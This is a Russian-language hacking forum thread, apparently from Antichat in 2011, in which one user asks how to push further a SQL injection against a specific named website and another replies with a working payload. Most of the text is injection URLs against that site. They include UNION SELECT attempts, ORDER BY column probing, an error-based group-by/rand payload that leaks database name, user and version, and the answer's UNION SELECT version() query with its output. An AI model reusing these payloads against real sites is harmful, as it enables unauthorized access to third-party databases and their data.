Ваши вопросы по уязвимостям.

#11

18.08.2011, 05:18

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

Цитата:

Сообщение от BigBear

Нарвался на одну интересную скулю.

Код:

http://sotchi-2014.info/content.php?id=1'

Пробовал сначала крутить через union, но скрипт грязно ругнулся

Код:

http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+

The used SELECT statements have a different number of columns

В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.
Но опять же следующий запрос выводится корректно

Код:

http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+  TRUE

http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+   FALSE

Что навело на мысль, что колонка всё таки 1.
Далее попробовал крутануть через другой метод.

Код:

http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database()),floor(rand(0)*2))+having+min(0)+or+1+--+

БД, юзверя, и версию выводит корректно.
На попытку вывести что либо ещё ругается на СЕЛЕКТ.
Подскажите, каким путём докрутить данную скулю ?

Там просто двойной запрос.

Колонка 1 учавствует в еще одном запросе и поэтому там ошибка. Но вывод получить можно, вывод в TITLE:

http://sotchi-2014.info/content.php?id=175'+and+1=2+UNION+SELECT+version()--+

4.0.26-log- Sotchi-2014.info

P.S.:

В твоем запросе (http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+) тоже есть вывод, посмотри внимательней на TITLE.